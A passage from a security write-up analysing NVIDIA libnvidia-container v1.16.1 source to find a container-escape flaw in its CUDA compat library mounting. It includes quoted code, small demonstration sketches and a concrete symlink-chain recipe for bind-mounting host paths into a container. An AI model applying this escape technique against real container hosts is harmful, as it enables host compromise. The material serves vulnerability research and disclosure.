                        if (libnvc.mig_device_access_caps_mount(nvc, cnt, devices.migs[i]) < 0) {
                                warnx("mount error: %s", libnvc.error(nvc));
                                goto fail;
                        }
                }
        }
        if (mig_config_devices.all && mig_config_devices.ngpus) {
                if (libnvc.mig_config_global_caps_mount(nvc, cnt) < 0) {
                        warnx("mount error: %s", libnvc.error(nvc));
                        goto fail;
                }
                for (size_t i = 0; i < mig_config_devices.ngpus; ++i) {
                        if (libnvc.device_mig_caps_mount(nvc, cnt, mig_config_devices.gpus[i]) < 0) {
                                warnx("mount error: %s", libnvc.error(nvc));
                                goto fail;
                        }
                }
        }
        if (mig_monitor_devices.all && mig_monitor_devices.ngpus) {
                if (libnvc.mig_monitor_global_caps_mount(nvc, cnt) < 0) {
                        warnx("mount error: %s", libnvc.error(nvc));
                        goto fail;
                }
                for (size_t i = 0; i < mig_monitor_devices.ngpus; ++i) {
                        if (libnvc.device_mig_caps_mount(nvc, cnt, mig_monitor_devices.gpus[i]) < 0) {
                                warnx("mount error: %s", libnvc.error(nvc));
                                goto fail;
                        }
                }
        }
        for (size_t i = 0; i < nvc_cfg->imex.nchans; ++i) {
                if (libnvc.imex_channel_mount(nvc, cnt, &nvc_cfg->imex.chans[i]) < 0) {
                        warnx("mount error: %s", libnvc.error(nvc));
                        goto fail;
                }
        }
 ...
        if (libnvc.ldcache_update(nvc, cnt) < 0) {
                warnx("ldcache error: %s", libnvc.error(nvc));
                goto fail;
        }
 ...
}

2.8 libnvidia-container's nvc_driver_mount function mounts the relevant files

nvc_driver_mount() mounts:

  • procfs: mounts the relevant host files under /proc/driver/nvidia into the container
  • app_profile: mounts the host configuration files under /etc/nvidia/nvidia-application-profiles-rc.d into the container
  • Host binary and library: mounts host binaries and dependency libraries into the container
  • Container library mounts: for forward compatibility, the user may supply newer CUDA libraries; the newer CUDA libraries under the container's /usr/local/cuda/compat directory are mounted into the container's lib directory
  • Firmware: mounts the relevant host files under /lib/firmware/nvidia into the container
  • IPC: mounts the host's /var/run/nvidia-persistenced/socket and related files into the container
  • Device: mounts the host's /dev/nvidia-uvm and /dev/nvidia-uvm-tools device files into the container

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L712

int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
        ...
        if (ns_enter(&ctx->err, cnt->mnt_ns, CLONE_NEWNS) < 0)
                return (-1);
        ...
        /* Procfs mount */
        if (ctx->dxcore.initialized)
                log_warn("skipping procfs mount on WSL");
        else if ((*ptr++ = mount_procfs(&ctx->err, ctx->cfg.root, cnt)) == NULL)
                goto fail;

        /* Application profile mount */
        if (cnt->flags & OPT_GRAPHICS_LIBS) {
                if (ctx->dxcore.initialized)
                        log_warn("skipping app profile mount on WSL");
                else if ((*ptr++ = mount_app_profile(&ctx->err, cnt)) == NULL)
                        goto fail;
        }

        /* Host binary and library mounts */
        if (info->bins != NULL && info->nbins > 0) {
                if ((tmp = (const char **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.bins_dir, info->bins, info->nbins)) == NULL)
                        goto fail;
                ptr = array_append(ptr, tmp, array_size(tmp));
                free(tmp);
        }
        if (info->libs != NULL && info->nlibs > 0) {
                if ((tmp = (const char **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.libs_dir, info->libs, info->nlibs)) == NULL)
                        goto fail;
                ptr = array_append(ptr, tmp, array_size(tmp));
                free(tmp);
        }
        if ((cnt->flags & OPT_COMPAT32) && info->libs32 != NULL && info->nlibs32 > 0) {
                if ((tmp = (const char **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.libs32_dir, info->libs32, info->nlibs32)) == NULL)
                        goto fail;
                ptr = array_append(ptr, tmp, array_size(tmp));
                free(tmp);
        }
        if (symlink_libraries(&ctx->err, cnt, mnt, (size_t)(ptr - mnt)) < 0)
                goto fail;

        /* Container library mounts */
        if (cnt->libs != NULL && cnt->nlibs > 0) {
                size_t nlibs = cnt->nlibs;
                char **libs = array_copy(&ctx->err, (const char * const *)cnt->libs, cnt->nlibs);
                if (libs == NULL)
                        goto fail;

                filter_libraries(info, libs, &nlibs);
                if ((tmp = (const char **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
                        free(libs);
                        goto fail;
                }
                ptr = array_append(ptr, tmp, array_size(tmp));
                free(tmp);
                free(libs);
        }

        /* Firmware mounts */
        for (size_t i = 0; i < info->nfirmwares; ++i) {
                if ((*ptr++ = mount_firmware(&ctx->err, ctx->cfg.root, cnt, info->firmwares[i])) == NULL) {
                        log_errf("error mounting firmware path %s", info->firmwares[i]);
                        goto fail;
                }
        }

        /* IPC mounts */
        for (size_t i = 0; i < info->nipcs; ++i) {
                /* XXX Only utility libraries require persistenced or fabricmanager IPC, everything else is compute only. */
                if (str_has_suffix(NV_PERSISTENCED_SOCKET, info->ipcs[i]) || str_has_suffix(NV_FABRICMANAGER_SOCKET, info->ipcs[i])) {
                        if (!(cnt->flags & OPT_UTILITY_LIBS))
                                continue;
                } else if (!(cnt->flags & OPT_COMPUTE_LIBS))
                        continue;
                if ((*ptr++ = mount_ipc(&ctx->err, ctx->cfg.root, cnt, info->ipcs[i])) == NULL)
                        goto fail;
        }

        /* Device mounts */
        for (size_t i = 0; i < info->ndevs; ++i) {
                /* On WSL2 we only mount the /dev/dxg device and as such these checks are not applicable. */
                if (!ctx->dxcore.initialized) {
                        /* XXX Only compute libraries require specific devices (e.g. UVM). */
                        if (!(cnt->flags & OPT_COMPUTE_LIBS) && major(info->devs[i].id) != NV_DEVICE_MAJOR)
                                continue;
                        /* XXX Only display capability requires the modeset device. */
                        if (!(cnt->flags & OPT_DISPLAY) && minor(info->devs[i].id) == NV_MODESET_DEVICE_MINOR)
                                continue;
                }
                if (!(cnt->flags & OPT_NO_DEVBIND)) {
                        if ((*ptr++ = mount_device(&ctx->err, ctx->cfg.root, cnt, &info->devs[i])) == NULL)
                                goto fail;
                }
                if (!(cnt->flags & OPT_NO_CGROUPS)) {
                        if (setup_device_cgroup(&ctx->err, cnt, info->devs[i].id) < 0)
                                goto fail;
                }
        }
        rv = 0;

 fail:
        if (rv < 0) {
                for (size_t i = 0; mnt != NULL && i < nmnt; ++i)
                        unmount(mnt[i]);
                assert_func(ns_enter_at(NULL, ctx->mnt_ns, CLONE_NEWNS));
        } else {
                rv = ns_enter_at(&ctx->err, ctx->mnt_ns, CLONE_NEWNS);
        }

        array_free((char **)mnt, nmnt);
        return (rv);
}

2.9 Mounting the container's CUDA library files

We now focus on the container-to-container mount, i.e. the CUDA forward-compatibility feature.

The CUDA library files collected from inside the container (cnt->libs) are filtered by filter_libraries and then mounted into the container.

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L767C1-L782C10

int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
 ...
        /* Container library mounts */
        if (cnt->libs != NULL && cnt->nlibs > 0) {
                size_t nlibs = cnt->nlibs;
                char **libs = array_copy(&ctx->err, (const char * const *)cnt->libs, cnt->nlibs);
                if (libs == NULL)
                        goto fail;

                filter_libraries(info, libs, &nlibs);
                if ((tmp = (const char **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
                        free(libs);
                        goto fail;
                }
                ptr = array_append(ptr, tmp, array_size(tmp));
                free(tmp);
                free(libs);
        }
 ...
}

Here cnt->libs holds the container's /usr/local/cuda/compat/lib*.so.* files.

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L61

static int
find_library_paths(struct error *err, struct nvc_container *cnt)
{
        char path[PATH_MAX];
        glob_t gl;
        int rv = -1;
        char **ptr;

        if (!(cnt->flags & OPT_COMPUTE_LIBS))
                return (0);

        if (path_resolve_full(err, path, cnt->cfg.rootfs, cnt->cfg.cudart_dir) < 0)
                return (-1);
        if (path_append(err, path, "compat/lib*.so.*") < 0)
                return (-1);

        if (xglob(err, path, GLOB_ERR, NULL, &gl) < 0)
                goto fail;
        if (gl.gl_pathc > 0) {
                cnt->nlibs = gl.gl_pathc;
                cnt->libs = ptr = array_new(err, gl.gl_pathc);
                if (cnt->libs == NULL)
                        goto fail;

                for (size_t i = 0; i < gl.gl_pathc; ++i) {
                        if (path_resolve(err, path, cnt->cfg.rootfs, gl.gl_pathv[i] + strlen(cnt->cfg.rootfs)) < 0)
                                goto fail;
                        if (!str_array_match(path, (const char * const *)cnt->libs, (size_t)(ptr - cnt->libs))) {
                                log_infof("selecting %s%s", cnt->cfg.rootfs, path);
                                if ((*ptr++ = xstrdup(err, path)) == NULL)
                                        goto fail;
                        }
                }
                array_pack(cnt->libs, &cnt->nlibs);
        }
        rv = 0;

 fail:
        globfree(&gl);
        return (rv);
}

filter_libraries only keeps (and therefore mounts) libraries that satisfy both of the following:

  1. the file name contains .so.
  2. the version number does not match the host CUDA driver version

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L562

static void
filter_libraries(const struct nvc_driver_info *info, char * paths[], size_t *size)
{
        char *lib, *maj;

        /*
         * XXX Filter out any library that matches the major version of RM to prevent us from
         * running into an unsupported configurations (e.g. CUDA compat on Geforce or non-LTS drivers).
         */

        for (size_t i = 0; i < *size; ++i) {
                lib = basename(paths[i]);
                if ((maj = strstr(lib, ".so.")) != NULL) {
                        maj += strlen(".so.");
                        if (strncmp(info->nvrm_version, maj, strspn(maj, "0123456789")))
                                continue;
                }
                paths[i] = NULL;
        }
        array_pack(paths, size);
}

3. Vulnerability analysis

3.1 Locating the vulnerable spot

Let us first posit the desired effect: mounting an arbitrary host file into the container. Achieving it requires that the mount's source path be attacker-controllable.

Per section "2. Call-chain analysis", the CUDA forward-compatibility feature offers exactly such an opportunity: it mounts files from the container into the container.

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L767C1-L782C10

int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
 ...
        /* Container library mounts */
        if (cnt->libs != NULL && cnt->nlibs > 0) {
                size_t nlibs = cnt->nlibs;
                char **libs = array_copy(&ctx->err, (const char * const *)cnt->libs, cnt->nlibs);
                if (libs == NULL)
                        goto fail;

                filter_libraries(info, libs, &nlibs);
                if ((tmp = (const char **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
                        free(libs);
                        goto fail;
                }
                ptr = array_append(ptr, tmp, array_size(tmp));
                free(tmp);
                free(libs);
        }
 ...
}

If a libs path is a symlink pointing at a host directory, and nothing downstream defends against it, the desired effect becomes reachable.

The mount itself has essentially no protection; the only gate is passing the match_binary_flags() check.

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L100

static char **
mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size)
{
        char src[PATH_MAX];
        char dst[PATH_MAX];
        mode_t mode;
        char *src_end, *dst_end, *file;
        char **mnt, **ptr;

        if (path_new(err, src, root) < 0)
                return (NULL);
        if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0)
                return (NULL);
        if (file_create(err, dst, NULL, cnt->uid, cnt->gid, MODE_DIR(0755)) < 0)
                return (NULL);
        src_end = src + strlen(src);
        dst_end = dst + strlen(dst);

        mnt = ptr = array_new(err, size + 1); /* NULL terminated. */
        if (mnt == NULL)
                return (NULL);

        for (size_t i = 0; i < size; ++i) {
                file = basename(paths[i]);
                if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags))
                        continue;
                if (path_append(err, src, paths[i]) < 0)
                        goto fail;
                if (path_append(err, dst, file) < 0)
                        goto fail;
                if (file_mode(err, src, &mode) < 0)
                        goto fail;
                if (file_create(err, dst, NULL, cnt->uid, cnt->gid, mode) < 0)
                        goto fail;

                log_infof("mounting %s at %s", src, dst);
                if (xmount(err, src, dst, NULL, MS_BIND, NULL) < 0)
                        goto fail;
                if (xmount(err, NULL, dst, NULL, MS_BIND|MS_REMOUNT | MS_RDONLY|MS_NODEV|MS_NOSUID, NULL) < 0)
                        goto fail;
                if ((*ptr++ = xstrdup(err, dst)) == NULL)
                        goto fail;
                *src_end = '\0';
                *dst_end = '\0';
        }
        return (mnt);

 fail:
        for (size_t i = 0; i < size; ++i)
                unmount(mnt[i]);
        array_free(mnt, size);
        return (NULL);
}

What remains is straightforward:

  1. Find out which files count as "libs" => find_library_paths() and filter_libraries()
  2. Replace the target file with a symlink to a host file, so the later mount pulls the host file into the container (a minimal bind-mount sketch follows this list)
  3. Satisfy the match_binary_flags() or match_library_flags() check
  4. Reach the actual mount call
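
As a quick sanity check of step 2, here is a minimal standalone sketch (hypothetical /tmp/demo paths; must run as root) showing that mount(2) resolves symlinks in its source argument, the same primitive exercised by the xmount(..., MS_BIND, ...) call in mount_files above:

#include <stdio.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
        /* /tmp/demo/src is a symlink to "/" (standing in for a host path);
         * /tmp/demo/dst is an empty directory acting as the mount target. */
        mkdir("/tmp/demo", 0755);
        mkdir("/tmp/demo/dst", 0755);
        symlink("/", "/tmp/demo/src");
        /* mount(2) follows the symlink in the source path, so the bind
         * mount actually exposes "/" at /tmp/demo/dst. */
        if (mount("/tmp/demo/src", "/tmp/demo/dst", NULL, MS_BIND, NULL) < 0) {
                perror("mount");
                return (1);
        }
        puts("/tmp/demo/dst now shows the contents of /");
        return (0);
}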

3.2 Data-format analysis

We now analyze the constraints imposed by find_library_paths(), filter_libraries(), match_binary_flags() and match_library_flags().

3.2.1 find_library_paths()

TLDR;

  1. The exploitation path is the container's /usr/local/cuda/compat/lib*.so.* path
  2. Symlinks are resolved before the paths are added to cnt->libs
  3. Note: at this point the process has not yet joined the container's mount namespace

By default, find_library_paths() looks for libs under the container rootfs at /usr/local/cuda/compat/lib*.so.*.

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L73

static int
find_library_paths(struct error *err, struct nvc_container *cnt)
{
        char path[PATH_MAX];
        glob_t gl;
        int rv = -1;
        char **ptr;

        if (!(cnt->flags & OPT_COMPUTE_LIBS))
                return (0);

        if (path_resolve_full(err, path, cnt->cfg.rootfs, cnt->cfg.cudart_dir) < 0)
                return (-1);
        if (path_append(err, path, "compat/lib*.so.*") < 0)
                return (-1);

        if (xglob(err, path, GLOB_ERR, NULL, &gl) < 0)
                goto fail;
        if (gl.gl_pathc > 0) {
  ...
        }
        rv = 0;

 fail:
        globfree(&gl);
        return (rv);
}

Each target path is symlink-resolved once; if the target is a symlink it must resolve successfully, and the resolved path is added to cnt->libs.

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L85

static int
find_library_paths(struct error *err, struct nvc_container *cnt)
{
 ...
        if (gl.gl_pathc > 0) {
                cnt->nlibs = gl.gl_pathc;
                cnt->libs = ptr = array_new(err, gl.gl_pathc);
                if (cnt->libs == NULL)
                        goto fail;

                for (size_t i = 0; i < gl.gl_pathc; ++i) {
                        if (path_resolve(err, path, cnt->cfg.rootfs, gl.gl_pathv[i] + strlen(cnt->cfg.rootfs)) < 0)
                                goto fail;
                        if (!str_array_match(path, (const char * const *)cnt->libs, (size_t)(ptr - cnt->libs))) {
                                log_infof("selecting %s%s", cnt->cfg.rootfs, path);
                                if ((*ptr++ = xstrdup(err, path)) == NULL)
                                        goto fail;
                        }
                }
                array_pack(cnt->libs, &cnt->nlibs);
        }
 ...
}

do_path_resolve splits the path on '/' and resolves the symlink in each segment; segments that do not exist are kept verbatim.

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/utils.c#L802

static int
do_path_resolve(struct error *err, bool full, char *buf, const char *root, const char *path)
{
        int fd = -1;
        int rv = -1;
        char realpath[PATH_MAX];
        char dbuf[2][PATH_MAX];
        char *link = dbuf[0];
        char *ptr = dbuf[1];
        char *file, *p;
        unsigned int noents = 0;
        unsigned int nlinks = 0;
        ssize_t n;

        *ptr = '\0';
        *realpath = '\0';
        assert(*root == '/');

        if ((fd = open_next(err, -1, root)) < 0)
                goto fail;
        if (path_append(err, ptr, path) < 0)
                goto fail;

        while ((file = strsep(&ptr, "/")) != NULL) {
                if (*file == '\0' || str_equal(file, "."))
                        continue;
                else if (str_equal(file, "..")) {
                        /*
                         * Remove the last component from the resolved path. If we are not below
                         * non-existent components, restore the previous file descriptor as well.
                         */

                        if ((p = strrchr(realpath, '/')) == NULL) {
                                error_setx(err, "path error: %s resolves outside of %s", path, root);
                                goto fail;
                        }
                        *p = '\0';
                        if (noents > 0)
                                --noents;
                        else {
                                if ((fd = open_next(err, fd, "..")) < 0)
                                        goto fail;
                        }
                } else {
                        if (noents > 0)
                                goto missing_ent;

                        n = readlinkat(fd, file, link, PATH_MAX);
                        if (n > 0 && n < PATH_MAX && nlinks < MAXSYMLINKS) {
                                /*
                                 * Component is a symlink, append the rest of the path to it and
                                 * proceed with the resulting buffer. If it is absolute, also clear
                                 * the resolved path and reset our file descriptor to root.
                                 */

                                link[n] = '\0';
                                if (*link == '/') {
                                        ++link;
                                        *realpath = '\0';
                                        if ((fd = open_next(err, fd, root)) < 0)
                                                goto fail;
                                }
                                if (ptr != NULL) {
                                        if (path_append(err, link, ptr) < 0)
                                                goto fail;
                                }
                                ptr = link;
                                link = dbuf[++nlinks % 2];
                        } else {
                                if (n >= PATH_MAX)
                                        errno = ENAMETOOLONG;
                                else if (nlinks >= MAXSYMLINKS)
                                        errno = ELOOP;
                                switch (errno) {
                                missing_ent:
                                case ENOENT:
                                        /* Component doesn't exist */
                                        ++noents;
                                        if (path_append(err, realpath, file) < 0)
                                                goto fail;
                                        break;
                                case EINVAL:
                                        /* Not a symlink, proceed normally */
                                        if ((fd = open_next(err, fd, file)) < 0)
                                                goto fail;
                                        if (path_append(err, realpath, file) < 0)
                                                goto fail;
                                        break;
                                default:
                                        error_set(err, "path error: %s/%s", root, path);
                                        goto fail;
                                }
                        }
                }
        }

        if (!full) {
                if (path_new(err, buf, realpath) < 0)
                        goto fail;
        } else {
                if (path_join(err, buf, root, realpath) < 0)
                        goto fail;
        }
        rv = 0;

 fail:
        xclose(fd);
        return (rv);
}

int
path_resolve(struct error *err, char *buf, const char *root, const char *path)
{
        return (do_path_resolve(err, false, buf, root, path));
}

Two things are worth noting:

  1. When find_library_paths runs, the process has not yet joined the container's mount namespace
  2. When the mounts actually happen later, nvc_driver_mount enters the container's mount namespace

This difference can be exploited to make the two resolutions diverge: a path can appear non-existent (and therefore unresolvable as a symlink) while find_library_paths runs, yet resolve successfully as a symlink when nvc_driver_mount runs. The sketch below makes this concrete.
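
A small hypothetical sketch of a do_path_resolve()-style component resolver (the /volume path matches the PoC shown later): run outside the container's mount namespace, the component is missing and is kept verbatim; run inside, the same name is a symlink that a later mount(2) will follow.

#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <unistd.h>

/* Resolve one path component the way do_path_resolve() treats it:
 * a symlink is replaced by its target, while a missing component
 * (ENOENT) or a non-symlink (EINVAL) is kept verbatim. */
static const char *
resolve_component(const char *path, char *buf, size_t size)
{
        ssize_t n = readlink(path, buf, size - 1);
        if (n >= 0) {
                buf[n] = '\0';
                return (buf);   /* symlink: use its target */
        }
        if (errno == ENOENT || errno == EINVAL)
                return (path);  /* missing or regular file: keep as-is */
        return (NULL);
}

int main(void)
{
        char buf[PATH_MAX];
        /* On the host, /volume/libnvidia-ml.so.999 does not exist, so the
         * literal path survives resolution; inside the container's mount
         * namespace the same name is a symlink to "/". */
        printf("resolved: %s\n",
            resolve_component("/volume/libnvidia-ml.so.999", buf, sizeof(buf)));
        return (0);
}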

3.2.2 filter_libraries()

filter_libraries() extracts a version number from each lib name and requires it to differ from nvrm_version: if the versions matched, there would be no point in mounting the library again.

Simply fabricating an arbitrary version number bypasses this check (see the sketch after the code below).

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L562

static void
filter_libraries(const struct nvc_driver_info *info, char * paths[], size_t *size)
{
        char *lib, *maj;

        /*
         * XXX Filter out any library that matches the major version of RM to prevent us from
         * running into an unsupported configurations (e.g. CUDA compat on Geforce or non-LTS drivers).
         */

        for (size_t i = 0; i < *size; ++i) {
                lib = basename(paths[i]);
                if ((maj = strstr(lib, ".so.")) != NULL) {
                        maj += strlen(".so.");
                        if (strncmp(info->nvrm_version, maj, strspn(maj, "0123456789")))
                                continue;
                }
                paths[i] = NULL;
        }
        array_pack(paths, size);
}
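
A minimal standalone recreation of this check (assuming a hypothetical host driver version of 550.54.14) shows why any fabricated suffix such as .so.999 survives the filter while a matching version is dropped:

#include <stdio.h>
#include <string.h>

/* Mirrors the check in filter_libraries(): a path is kept (and thus
 * later mounted) when its ".so.<digits>" version differs from the
 * driver's nvrm_version. */
static int
kept_by_filter(const char *nvrm_version, const char *lib)
{
        const char *maj = strstr(lib, ".so.");
        if (maj == NULL)
                return (0);     /* no ".so." -> filtered out */
        maj += strlen(".so.");
        return (strncmp(nvrm_version, maj, strspn(maj, "0123456789")) != 0);
}

int main(void)
{
        printf("%d\n", kept_by_filter("550.54.14", "libnvidia-ml.so.550")); /* 0: filtered */
        printf("%d\n", kept_by_filter("550.54.14", "libnvidia-ml.so.999")); /* 1: kept */
        return (0);
}
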
3.2.3 match_binary_flags() / match_library_flags()

TLDR;

  1. Set the environment variable NVIDIA_DRIVER_CAPABILITIES=all to pass all of the flags & OPT_XX checks.
  2. The bin/library file name must start with one of the preset prefixes.

The bin/library file name prefix must fall within the preset set.

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_info.c#L755

bool
match_binary_flags(const char *bin, int32_t flags)
{
        if ((flags & OPT_UTILITY_BINS) && str_array_match_prefix(bin, utility_bins, nitems(utility_bins)))
                return (true);
        if ((flags & OPT_COMPUTE_BINS) && str_array_match_prefix(bin, compute_bins, nitems(compute_bins)))
                return (true);
        return (false);
}

bool
match_library_flags(const char *lib, int32_t flags)
{
        if (str_array_match_prefix(lib, dxcore_libs, nitems(dxcore_libs)))
                return (true);
        if ((flags & OPT_UTILITY_LIBS) && str_array_match_prefix(lib, utility_libs, nitems(utility_libs)))
                return (true);
        if ((flags & OPT_COMPUTE_LIBS) && str_array_match_prefix(lib, compute_libs, nitems(compute_libs)))
                return (true);
        if ((flags & OPT_VIDEO_LIBS) && str_array_match_prefix(lib, video_libs, nitems(video_libs)))
                return (true);
        if ((flags & OPT_GRAPHICS_LIBS) && (str_array_match_prefix(lib, graphics_libs, nitems(graphics_libs)) ||
            str_array_match_prefix(lib, graphics_libs_glvnd, nitems(graphics_libs_glvnd)) ||
            str_array_match_prefix(lib, graphics_libs_compat, nitems(graphics_libs_compat))))
                return (true);
        if ((flags & OPT_NGX_LIBS) && str_array_match_prefix(lib, ngx_libs, nitems(ngx_libs)))
                return (true);
        return (false);
}

The flags can be controlled through the NVIDIA_DRIVER_CAPABILITIES environment variable; setting NVIDIA_DRIVER_CAPABILITIES=all enables every driver capability.

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/options.h#L82-L87

static const struct option container_opts[] = {
        ...
        {"utility", OPT_UTILITY_BINS|OPT_UTILITY_LIBS},
        {"compute", OPT_COMPUTE_BINS|OPT_COMPUTE_LIBS},
        {"video", OPT_VIDEO_LIBS|OPT_COMPUTE_LIBS},
        {"graphics", OPT_GRAPHICS_LIBS},
        {"display", OPT_DISPLAY|OPT_GRAPHICS_LIBS},
        {"ngx", OPT_NGX_LIBS},
        ...
};

The preset prefixes are:

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_info.c#L60

static const char * const utility_bins[] = {
        "nvidia-smi",                       /* System management interface */
        "nvidia-debugdump",                 /* GPU coredump utility */
        "nvidia-persistenced",              /* Persistence mode utility */
        "nv-fabricmanager",                 /* NVSwitch fabric manager utility */
        //"nvidia-modprobe",                /* Kernel module loader */
        //"nvidia-settings",                /* X server settings */
        //"nvidia-xconfig",                 /* X xorg.conf editor */
};

static const char * const compute_bins[] = {
        "nvidia-cuda-mps-control",          /* Multi process service CLI */
        "nvidia-cuda-mps-server",           /* Multi process service server */
};

static const char * const utility_libs[] = {
        "libnvidia-ml.so",                  /* Management library */
        "libnvidia-cfg.so",                 /* GPU configuration */
        "libnvidia-nscq.so",                /* Topology info for NVSwitches and GPUs */
};

static const char * const compute_libs[] = {
        "libcuda.so",                       /* CUDA driver library */
        "libcudadebugger.so",               /* CUDA Debugger Library */
        "libnvidia-opencl.so",              /* NVIDIA OpenCL ICD */
        "libnvidia-gpucomp.so",             /* Shared Compiler Library */
        "libnvidia-ptxjitcompiler.so",      /* PTX-SASS JIT compiler (used by libcuda) */
        "libnvidia-fatbinaryloader.so",     /* fatbin loader (used by libcuda) */
        "libnvidia-allocator.so",           /* NVIDIA allocator runtime library */
        "libnvidia-compiler.so",            /* NVVM-PTX compiler for OpenCL (used by libnvidia-opencl) */
        "libnvidia-pkcs11.so",              /* Encrypt/Decrypt library */
        "libnvidia-pkcs11-openssl3.so",     /* Encrypt/Decrypt library (OpenSSL 3 support) */
        "libnvidia-nvvm.so",                /* The NVVM Compiler library */
};

static const char * const video_libs[] = {
        "libvdpau_nvidia.so",               /* NVIDIA VDPAU ICD */
        "libnvidia-encode.so",              /* Video encoder */
        "libnvidia-opticalflow.so",         /* NVIDIA Opticalflow library */
        "libnvcuvid.so",                    /* Video decoder */
};

static const char * const graphics_libs[] = {
        //"libnvidia-egl-wayland.so",       /* EGL wayland platform extension (used by libEGL_nvidia) */
        "libnvidia-eglcore.so",             /* EGL core (used by libGLES*[_nvidia] and libEGL_nvidia) */
        "libnvidia-glcore.so",              /* OpenGL core (used by libGL or libGLX_nvidia) */
        "libnvidia-tls.so",                 /* Thread local storage (used by libGL or libGLX_nvidia) */
        "libnvidia-glsi.so",                /* OpenGL system interaction (used by libEGL_nvidia) */
        "libnvidia-fbc.so",                 /* Framebuffer capture */
        "libnvidia-ifr.so",                 /* OpenGL framebuffer capture */
        "libnvidia-rtcore.so",              /* Optix */
        "libnvoptix.so",                    /* Optix */
};

static const char * const graphics_libs_glvnd[] = {
        //"libGLX.so",                      /* GLX ICD loader */
        //"libOpenGL.so",                   /* OpenGL ICD loader */
        //"libGLdispatch.so",               /* OpenGL dispatch (used by libOpenGL, libEGL and libGLES*) */
        "libGLX_nvidia.so",                 /* OpenGL/GLX ICD */
        "libEGL_nvidia.so",                 /* EGL ICD */
        "libGLESv2_nvidia.so",              /* OpenGL ES v2 ICD */
        "libGLESv1_CM_nvidia.so",           /* OpenGL ES v1 common profile ICD */
        "libnvidia-glvkspirv.so",           /* SPIR-V Lib for Vulkan */
        "libnvidia-cbl.so",                 /* VK_NV_ray_tracing */
};

static const char * const graphics_libs_compat[] = {
        "libGL.so",                         /* OpenGL/GLX legacy _or_ compatibility wrapper (GLVND) */
        "libEGL.so",                        /* EGL legacy _or_ ICD loader (GLVND) */
        "libGLESv1_CM.so",                  /* OpenGL ES v1 common profile legacy _or_ ICD loader (GLVND) */
        "libGLESv2.so",                     /* OpenGL ES v2 legacy _or_ ICD loader (GLVND) */
};

static const char * const ngx_libs[] = {
        "libnvidia-ngx.so",                 /* NGX library */
};

static const char * const dxcore_libs[] = {
        "libdxcore.so",                     /* Core library for dxcore support */
};

3.3 Exploitation

Summarizing sections "3.1 Locating the vulnerable spot" and "3.2 Data-format analysis", exploitation must satisfy:

  1. Place a symlink at the container's /usr/local/cuda/compat/lib*.so.* path; note that find_library_paths() resolves symlinks before returning paths
  2. The file name must (1) contain .so. and (2) carry a version number different from nvrm_version
  3. Before the mount, the file name must match one of the preset prefixes

To achieve escape-level impact, the mount's source path must be a host path at mount time. The exploitation steps are therefore:

  1. Place a symlink at the container's /usr/local/cuda/compat/lib*.so.* path
  2. Join the container's mount namespace
  3. The file name must (1) contain .so. and (2) carry a version number different from nvrm_version
  4. Before the mount, the file name must match one of the preset prefixes
  5. At mount time, the source path must be a host path; mount itself resolves symlinks, which is what pulls the host path into the container. Note the mount is read-only

To satisfy step 5 the symlink should point at a host path, but that breaks the requirements of steps 2 and 3. Two layers of symlinks are therefore needed, for example:

/usr/local/cuda/compat/libssst0n3.so.1 -> /?/libnvidia-ml.so.999 -> /HOST

  1. /usr/local/cuda/compat/libssst0n3.so.1 -> /?/libnvidia-ml.so.999 satisfies steps 1, 2, 3 and 4
  2. /?/libnvidia-ml.so.999 -> /HOST satisfies step 5

In practice, however, when find_library_paths() calls do_path_resolve() to resolve the symlink, the chain may be resolved straight through to the final host target, breaking steps 2, 3 and 4.

The main problem to solve is how to satisfy both at once, i.e. how to make:

  1. do_path_resolve() resolve the symlink to /?/libnvidia-ml.so.999
  2. mount resolve the symlink to /HOST

How can this be achieved? There are two ideas:

  1. Construct a non-existent path so that the first resolution stops early: do_path_resolve() keeps non-existent path components verbatim
  2. Race condition: two containers share a directory and flip the symlink target concurrently

The race is the easier route to the goal, but it imposes a strict exploitation precondition, so we pursue the feasibility of the first idea.

Noting that step 1 executes before joining the container's mount namespace, there are three ways to construct the non-existent path:

  1. (ssst0n3) Mounted volume: /usr/local/cuda/compat/libssst0n3.so.1 -> /volume/libnvidia-ml.so.999 -> /
  2. (ssst0n3) procfs: /usr/local/cuda/compat/libssst0n3.so.1 -> /proc/?/libnvidia-ml.so.999 -> /
